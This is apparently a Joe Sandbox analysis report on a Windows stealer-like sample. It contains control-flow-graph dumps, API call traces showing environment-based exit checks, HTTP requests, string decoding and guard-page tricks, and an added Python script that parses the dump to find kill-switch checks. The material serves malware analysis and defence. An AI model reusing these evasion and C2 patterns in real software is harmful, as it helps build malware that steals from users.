27616 41a920 lstrcpy lstrcpy lstrcatA 27509->27616 27511 404d6e 27512 41a8a0 lstrcpy 27511->27512 27513 404d77 27512->27513 27514 41a740 lstrcpy 27513->27514 27515 404d92 27514->27515 27617 41a920 lstrcpy lstrcpy lstrcatA 27515->27617 27517 404db3 27618 41a920 lstrcpy lstrcpy lstrcatA 27517->27618 
27519 404dba 27520 41a8a0 lstrcpy 27519->27520 27521 404dc6 27520->27521 27522 404de7 lstrlenA 27521->27522 27523 404dfa 27522->27523 27524 404e03 lstrlenA 27523->27524 27619 41aad0 27524->27619 27526 404e13 HttpSendRequestA 27527 404e32 InternetReadFile 27526->27527 27528 404e67 InternetCloseHandle 27527->27528 27533 404e5e 27527->27533 27531 41a800 27528->27531 27530 41a9b0 4 API calls 27530->27533 27531->27453 27532 41a8a0 lstrcpy 27532->27533 27533->27527 27533->27528 27533->27530 27533->27532 27624 41aad0 27534->27624 27536 4117c4 StrCmpCA 27537 4117d7 27536->27537 27538 4117cf ExitProcess 27536->27538 27539 4117e7 strtok_s 27537->27539 27542 4117f4 27539->27542 27540 4119c2 27540->26457 27541 41199e strtok_s 27541->27542 27542->27540 27542->27541 27543 4118ad StrCmpCA 27542->27543 27544 4118cf StrCmpCA 27542->27544 27545 4118f1 StrCmpCA 27542->27545 27546 411951 StrCmpCA 27542->27546 27547 411970 StrCmpCA 27542->27547 27548 411913 StrCmpCA 27542->27548 27549 411932 StrCmpCA 27542->27549 27550 41185d StrCmpCA 27542->27550 27551 41187f StrCmpCA 27542->27551 27552 41a820 2 API calls 27542->27552 27553 41a820 lstrlenA lstrcpy 27542->27553 27543->27542 27544->27542 27545->27542 27546->27542 27547->27542 27548->27542 27549->27542 27550->27542 27551->27542 27552->27541 27553->27542 27554->26463 27555->26465 27556->26471 27557->26473 27558->26479 27559->26481 27560->26485 27561->26489 27562->26493 27563->26499 27564->26501 27565->26505 27566->26519 27567->26522 27568->26523 27569->26518 27570->26523 27571->26538 27572->26525 27573->26529 27574->26530 27575->26535 27576->26540 27577->26542 27578->26549 27579->26555 27580->26576 27581->26580 27582->26579 27583->26575 27584->26579 27585->26589 27588 41a7a0 lstrcpy 27587->27588 27589 401683 27588->27589 27590 41a7a0 lstrcpy 27589->27590 27591 401695 27590->27591 27592 41a7a0 lstrcpy 27591->27592 27593 4016a7 27592->27593 27594 41a7a0 lstrcpy 27593->27594 27595 4015a3 27594->27595 27595->27315 27620 401030 27596->27620 
27600 404838 lstrlenA 27623 41aad0 27600->27623 27602 404848 InternetCrackUrlA 27603 404867 27602->27603 27603->27392 27605 409af9 LocalAlloc 27604->27605 27606 404eee 27604->27606 27605->27606 27607 409b14 CryptStringToBinaryA 27605->27607 27606->27414 27606->27417 27607->27606 27608 409b39 LocalFree 27607->27608 27608->27606 27609->27408 27610->27412 27611->27431 27612->27446 27613->27459 27614->27479 27615->27491 27616->27511 27617->27517 27618->27519 27619->27526 27621 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27620->27621 27622 41aad0 27621->27622 27622->27600 27623->27602 27624->27536 27750 416ab1 902 API calls 27719 4069f3 7 API calls 27692 22e0297 131 API calls 27693 22eae93 43 API calls ctype 27752 41cafe 219 API calls 5 library calls 27754 22ecce9 162 API calls ___crtGetStringTypeA 27788 22e19e7 StrCmpCA ExitProcess strtok_s strtok_s 27789 22e35e4 9 API calls 26196 401190 26203 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26196->26203 26198 40119e 26199 4011cc 26198->26199 26205 417850 GetProcessHeap HeapAlloc GetUserNameA 26198->26205 26201 4011b7 26201->26199 26202 4011c4 ExitProcess 26201->26202 26204 417939 26203->26204 26204->26198 26206 4178c3 26205->26206 26206->26201 27755 22e30f9 7 API calls 27756 22df8f1 32 API calls 27757 41ce9f 69 API calls __amsg_exit 27696 4088a4 RaiseException task __CxxThrowException@8 27697 4180a5 GetProcessHeap HeapFree 27721 22e13c7 strtok_s strtok_s 27762 22e3823 8 API calls 27723 41b9b0 RtlUnwind 27652 849a7e 27653 849a8d 27652->27653 27656 84a21e 27653->27656 27662 84a239 27656->27662 27657 84a242 CreateToolhelp32Snapshot 27658 84a25e Module32First 27657->27658 27657->27662 27659 84a26d 27658->27659 27661 849a96 27658->27661 27663 849edd 27659->27663 27662->27657 27662->27658 27664 849f08 27663->27664 27665 849f51 27664->27665 27666 849f19 VirtualAlloc 27664->27666 27665->27665 27666->27665 27764 22e30d0 9 API calls
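Reading a dump like the one above by hand is impractical. The following Python script is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the dump's node and edge tokens and answers two questions an analyst asks of such a graph, namely at which addresses a given API is called and which blocks branch straight into ExitProcess together with the API-calling blocks that feed them (the sample's kill-switch checks). The embedded SAMPLE_DUMP is an abridged excerpt of this report's dump: node ids, addresses and API names are as on the page, but the lstrcpy/lstrcatA string-building nodes between the WinINet calls were left out, so a few edges in it skip over omitted nodes. The token rules (a node is "id address [API ...]", an edge is "src->dst", a decimal token of four or more digits starts a new node) are inferred from the listing and are an assumption.

```python
"""Reader for the flattened control-flow-graph dump that Joe Sandbox emits:
a node is "ID ADDRESS [API ...]" (or "ID ADDRESS N API calls" for a callee
that is only summarised) and an edge is "SRC->DST".  Two analyst questions
are answered: at which addresses is a given API called, and which blocks
branch straight into ExitProcess (kill-switch checks) and on what data."""
import re
from collections import defaultdict

# Abridged excerpt of the dump for process 2 (image base 0x400000) of this
# report.  Node ids, addresses and API names are copied from the page; the
# lstrcpy/lstrcatA string-building nodes between the WinINet calls were
# dropped, so a few edges here skip over omitted nodes.
SAMPLE_DUMP = """
26196 401190 26203 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26196->26203
26198 40119e 26199 4011cc 26198->26199 26205 417850 GetProcessHeap HeapAlloc GetUserNameA 26198->26205
26201 4011b7 26201->26199 26202 4011c4 ExitProcess 26201->26202
26204 417939 26203->26204 26204->26198 26206 4178c3 26205->26206 26206->26201
27402 40490b InternetOpenA StrCmpCA 27403 404944 27402->27403 27404 404955 27403->27404
27405 404ecb InternetCloseHandle 27403->27405 27407 404ee8 27405->27407
27449 404aa3 InternetConnectA 27404->27449 27449->27405
27450 404ad3 HttpOpenRequestA 27449->27450 27453 404ebe InternetCloseHandle 27450->27453 27453->27405
27526 404e13 HttpSendRequestA 27450->27526 27527 404e32 InternetReadFile 27526->27527
27528 404e67 InternetCloseHandle 27527->27528 27528->27453
27604 409ac0 CryptStringToBinaryA 27407->27604 27605 409af9 LocalAlloc 27604->27605
27607 409b14 CryptStringToBinaryA 27605->27607 27608 409b39 LocalFree 27607->27608
27624 41aad0 27536 4117c4 StrCmpCA 27624->27536 27537 4117d7 27536->27537
27538 4117cf ExitProcess 27536->27538 27539 4117e7 strtok_s 27537->27539
"""

NOISE = {"API", "calls", "library"}            # "34 API calls", "5 library calls"
API_TOKEN = re.compile(r"^[A-Za-z_?][\w@?]*$")  # also matches ??2@YAPAXI, __amsg_exit


def parse_cfg(text):
    """Return ({node_id: (address, [api, ...])}, [(src, dst), ...])."""
    nodes, edges = {}, []
    cur, expect_addr = None, False
    for tok in text.split():
        if "->" in tok:                       # an edge ends any open description
            src, dst = tok.split("->", 1)
            edges.append((src, dst))
            cur, expect_addr = None, False
        elif expect_addr:                     # the token after a node id is its address
            nodes[cur] = (tok, [])
            expect_addr = False
        elif tok.isdecimal() and (cur is None or len(tok) >= 4):
            cur, expect_addr = tok, True      # new node id (call counts are short numbers)
        elif cur is not None and tok not in NOISE and API_TOKEN.match(tok):
            nodes[cur][1].append(tok)
    return nodes, edges


def call_sites(nodes, api):
    """Sorted addresses of every block that calls `api`."""
    return sorted(addr for addr, apis in nodes.values() if api in apis)


def kill_switch_checks(nodes, edges, max_hops=4):
    """Blocks with an edge into an ExitProcess block, with the APIs of the
    nearest API-calling predecessors (the data the check is made on)."""
    preds = defaultdict(list)
    for src, dst in edges:
        preds[dst].append(src)
    found = []
    for src, dst in edges:
        if "ExitProcess" not in nodes.get(dst, ("", []))[1]:
            continue
        addr, apis = nodes[src]
        ancestors, frontier, seen = [], [src], {src}
        for _ in range(max_hops):             # walk backwards until APIs are found
            nxt = []
            for n in frontier:
                for p in preds[n]:
                    if p in seen or p not in nodes:
                        continue
                    seen.add(p)
                    if nodes[p][1]:
                        ancestors.extend(nodes[p][1])
                    else:
                        nxt.append(p)
            frontier = nxt
        found.append({"check": addr, "apis": apis, "preceded_by": ancestors})
    return sorted(found, key=lambda c: c["check"])


if __name__ == "__main__":
    n, e = parse_cfg(SAMPLE_DUMP)
    for api in ("InternetCloseHandle", "CryptStringToBinaryA", "ExitProcess"):
        print(api, call_sites(n, api))
    for check in kill_switch_checks(n, e):
        print(check)
```

On the excerpt it reports InternetCloseHandle at 404e67, 404ebe and 404ecb, CryptStringToBinaryA at 409ac0 and 409b14, and two blocks that branch into ExitProcess: 4011b7, whose nearest API-calling predecessor is the GetUserNameA block, and the StrCmpCA at 4117c4 that guards the strtok_s loop. Feeding it the complete dump (copied from the report as one string) gives the same tables for every function in the process.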

                                                            Control-flow Graph

                                                            APIs
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), refs: 004045CC, 004045D7, 004045E2, 004045ED, 004045F8
                                                            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                            • lstrlenA.KERNEL32(same string,?,0000000F,?,004169FB), refs: 0040461C, 00404627, 00404632, 0040463D, 00404648, 0040465C, 00404667, 00404672, 0040467D, 00404688
                                                            • lstrlenA.KERNEL32(same string), refs: 004046B1, 004046BC, 004046C7, 004046D2, 004046DD
                                                            • strlen.MSVCRT ref: 004046F0
                                                            • lstrlenA.KERNEL32(same string), refs: 00404718, 00404723, 0040472E, 00404739, 00404744, 00404754, 0040475F, 0040476A, 00404775, 00404780
                                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                            Profile: this is the function entered over 120 times from the call run at 004039d8 .. 004045a9 in the graph dump above. All 30 lstrlenA calls measure the same filler sentence (see Strings); the only other work visible is one heap allocation, one strlen and a final VirtualProtect on a 4-byte range with flNewProtect 00000100, which is PAGE_GUARD, consistent with the "create guard pages" signature in the overview. The argument values are static reconstructions by the IDA plugin; "?" marks arguments it could not resolve.
                                                            Strings
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., 30 xrefs: 004045C7, 004045D2, 004045DD, 004045E8, 004045F3, 00404617, 00404622, 0040462D, 00404638, 00404643, 00404657, 00404662, 0040466D, 00404678, 00404683, 004046AC, 004046B7, 004046C2, 004046CD, 004046D8, 00404713, 0040471E, 00404729, 00404734, 0040473F, 0040474F, 0040475A, 00404765, 00404770, 0040477B (each xref lies 5 bytes before the matching lstrlenA call site in the APIs list, i.e. the push of the string pointer)
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 
2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 
Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                            • API String ID: 2127927946-2218711628
                                                            • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                            • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                            • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                            • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocNameProcessUser
                                                            • String ID:
                                                            • API String ID: 1206570057-0
                                                            • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                            • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                            • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                            • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                            APIs
                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                            • ExitProcess.KERNEL32 ref: 0040117E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitInfoProcessSystem
                                                            • String ID:
                                                            • API String ID: 752954902-0
                                                            • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                            • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                            • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                            • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                                            APIs
                                                            • GetProcAddress.KERNEL32(75900000,00842C50), ref: 00419C2D
                                                            • GetProcAddress.KERNEL32(75900000,00842DB0), ref: 00419C45
                                                            • GetProcAddress.KERNEL32(75900000,00874350), ref: 00419C5E
                                                            • GetProcAddress.KERNEL32(75900000,00874248), ref: 00419C76
                                                            • GetProcAddress.KERNEL32(75900000,00874338), ref: 00419C8E
                                                            • GetProcAddress.KERNEL32(75900000,00874368), ref: 00419CA7
                                                            • GetProcAddress.KERNEL32(75900000,00846558), ref: 00419CBF
                                                            • GetProcAddress.KERNEL32(75900000,008743B0), ref: 00419CD7
                                                            • GetProcAddress.KERNEL32(75900000,00878F10), ref: 00419CF0
                                                            • GetProcAddress.KERNEL32(75900000,00878E98), ref: 00419D08
                                                            • GetProcAddress.KERNEL32(75900000,00878EB0), ref: 00419D20
                                                            • GetProcAddress.KERNEL32(75900000,00842C70), ref: 00419D39
                                                            • GetProcAddress.KERNEL32(75900000,00842B10), ref: 00419D51
                                                            • GetProcAddress.KERNEL32(75900000,00842D30), ref: 00419D69
                                                            • GetProcAddress.KERNEL32(75900000,00842CB0), ref: 00419D82
                                                            • GetProcAddress.KERNEL32(75900000,00878CE8), ref: 00419D9A
                                                            • GetProcAddress.KERNEL32(75900000,00878DA8), ref: 00419DB2
                                                            • GetProcAddress.KERNEL32(75900000,00846580), ref: 00419DCB
                                                            • GetProcAddress.KERNEL32(75900000,00842B30), ref: 00419DE3
                                                            • GetProcAddress.KERNEL32(75900000,00878E50), ref: 00419DFB
                                                            • GetProcAddress.KERNEL32(75900000,00878C28), ref: 00419E14
                                                            • GetProcAddress.KERNEL32(75900000,00878E20), ref: 00419E2C
                                                            • GetProcAddress.KERNEL32(75900000,00878C88), ref: 00419E44
                                                            • GetProcAddress.KERNEL32(75900000,00842B50), ref: 00419E5D
                                                            • GetProcAddress.KERNEL32(75900000,00878EF8), ref: 00419E75
                                                            • GetProcAddress.KERNEL32(75900000,00878CD0), ref: 00419E8D
                                                            • GetProcAddress.KERNEL32(75900000,00878DD8), ref: 00419EA6
                                                            • GetProcAddress.KERNEL32(75900000,00878DC0), ref: 00419EBE
                                                            • GetProcAddress.KERNEL32(75900000,00878EC8), ref: 00419ED6
                                                            • GetProcAddress.KERNEL32(75900000,00878E80), ref: 00419EEF
                                                            • GetProcAddress.KERNEL32(75900000,00878E38), ref: 00419F07
                                                            • GetProcAddress.KERNEL32(75900000,00878D60), ref: 00419F1F
                                                            • GetProcAddress.KERNEL32(75900000,00878D48), ref: 00419F38
                                                            • GetProcAddress.KERNEL32(75900000,00845310), ref: 00419F50
                                                            • GetProcAddress.KERNEL32(75900000,00878C58), ref: 00419F68
                                                            • GetProcAddress.KERNEL32(75900000,00878E68), ref: 00419F81
                                                            • GetProcAddress.KERNEL32(75900000,00842B70), ref: 00419F99
                                                            • GetProcAddress.KERNEL32(75900000,00878C40), ref: 00419FB1
                                                            • GetProcAddress.KERNEL32(75900000,00842CD0), ref: 00419FCA
                                                            • GetProcAddress.KERNEL32(75900000,00878D00), ref: 00419FE2
                                                            • GetProcAddress.KERNEL32(75900000,00878D18), ref: 00419FFA
                                                            • GetProcAddress.KERNEL32(75900000,00842D70), ref: 0041A013
                                                            • GetProcAddress.KERNEL32(75900000,00842DD0), ref: 0041A02B
                                                            • LoadLibraryA.KERNEL32(00878EE0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                            • LoadLibraryA.KERNEL32(00878C70,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                            • LoadLibraryA.KERNEL32(00878CA0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                            • LoadLibraryA.KERNEL32(00878CB8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                            • LoadLibraryA.KERNEL32(00878D30,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                            • LoadLibraryA.KERNEL32(00878D78,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                            • LoadLibraryA.KERNEL32(00878D90,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                            • LoadLibraryA.KERNEL32(00878DF0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                            • GetProcAddress.KERNEL32(75FD0000,00842DF0), ref: 0041A0DA
                                                            • GetProcAddress.KERNEL32(75FD0000,00878E08), ref: 0041A0F2
                                                            • GetProcAddress.KERNEL32(75FD0000,008762D0), ref: 0041A10A
                                                            • GetProcAddress.KERNEL32(75FD0000,00878F40), ref: 0041A123
                                                            • GetProcAddress.KERNEL32(75FD0000,008431F0), ref: 0041A13B
                                                            • GetProcAddress.KERNEL32(73530000,00846418), ref: 0041A160
                                                            • GetProcAddress.KERNEL32(73530000,008431B0), ref: 0041A179
                                                            • GetProcAddress.KERNEL32(73530000,00846238), ref: 0041A191
                                                            • GetProcAddress.KERNEL32(73530000,00878F58), ref: 0041A1A9
                                                            • GetProcAddress.KERNEL32(73530000,00878F88), ref: 0041A1C2
                                                            • GetProcAddress.KERNEL32(73530000,00843150), ref: 0041A1DA
                                                            • GetProcAddress.KERNEL32(73530000,00843110), ref: 0041A1F2
                                                            • GetProcAddress.KERNEL32(73530000,00878FB8), ref: 0041A20B
                                                            • GetProcAddress.KERNEL32(763B0000,008430B0), ref: 0041A22C
                                                            • GetProcAddress.KERNEL32(763B0000,008431D0), ref: 0041A244
                                                            • GetProcAddress.KERNEL32(763B0000,00878FE8), ref: 0041A25D
                                                            • GetProcAddress.KERNEL32(763B0000,00878F70), ref: 0041A275
                                                            • GetProcAddress.KERNEL32(763B0000,008430F0), ref: 0041A28D
                                                            • GetProcAddress.KERNEL32(750F0000,00846260), ref: 0041A2B3
                                                            • GetProcAddress.KERNEL32(750F0000,00845EC8), ref: 0041A2CB
                                                            • GetProcAddress.KERNEL32(750F0000,00878F28), ref: 0041A2E3
                                                            • GetProcAddress.KERNEL32(750F0000,008430D0), ref: 0041A2FC
                                                            • GetProcAddress.KERNEL32(750F0000,00843210), ref: 0041A314
                                                            • GetProcAddress.KERNEL32(750F0000,00845EF0), ref: 0041A32C
                                                            • GetProcAddress.KERNEL32(75A50000,00878FA0), ref: 0041A352
                                                            • GetProcAddress.KERNEL32(75A50000,00843130), ref: 0041A36A
                                                            • GetProcAddress.KERNEL32(75A50000,008761B0), ref: 0041A382
                                                            • GetProcAddress.KERNEL32(75A50000,00878FD0), ref: 0041A39B
                                                            • GetProcAddress.KERNEL32(75A50000,008794B0), ref: 0041A3B3
                                                            • GetProcAddress.KERNEL32(75A50000,00843090), ref: 0041A3CB
                                                            • GetProcAddress.KERNEL32(75A50000,00843170), ref: 0041A3E4
                                                            • GetProcAddress.KERNEL32(75A50000,00879498), ref: 0041A3FC
                                                            • GetProcAddress.KERNEL32(75A50000,008794C8), ref: 0041A414
                                                            • GetProcAddress.KERNEL32(75070000,00843190), ref: 0041A436
                                                            • GetProcAddress.KERNEL32(75070000,008794E0), ref: 0041A44E
                                                            • GetProcAddress.KERNEL32(75070000,008795D0), ref: 0041A466
                                                            • GetProcAddress.KERNEL32(75070000,00879450), ref: 0041A47F
                                                            • GetProcAddress.KERNEL32(75070000,008794F8), ref: 0041A497
                                                            • GetProcAddress.KERNEL32(74E50000,00842FD0), ref: 0041A4B8
                                                            • GetProcAddress.KERNEL32(74E50000,00843230), ref: 0041A4D1
                                                            • GetProcAddress.KERNEL32(75320000,00843050), ref: 0041A4F2
                                                            • GetProcAddress.KERNEL32(75320000,008793A8), ref: 0041A50A
                                                            • GetProcAddress.KERNEL32(6F060000,00843250), ref: 0041A530
                                                            • GetProcAddress.KERNEL32(6F060000,00842F50), ref: 0041A548
                                                            • GetProcAddress.KERNEL32(6F060000,00843270), ref: 0041A560
                                                            • GetProcAddress.KERNEL32(6F060000,00879480), ref: 0041A579
                                                            • GetProcAddress.KERNEL32(6F060000,00842ED0), ref: 0041A591
                                                            • GetProcAddress.KERNEL32(6F060000,00842FF0), ref: 0041A5A9
                                                            • GetProcAddress.KERNEL32(6F060000,00842EF0), ref: 0041A5C2
                                                            • GetProcAddress.KERNEL32(6F060000,00842F10), ref: 0041A5DA
                                                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
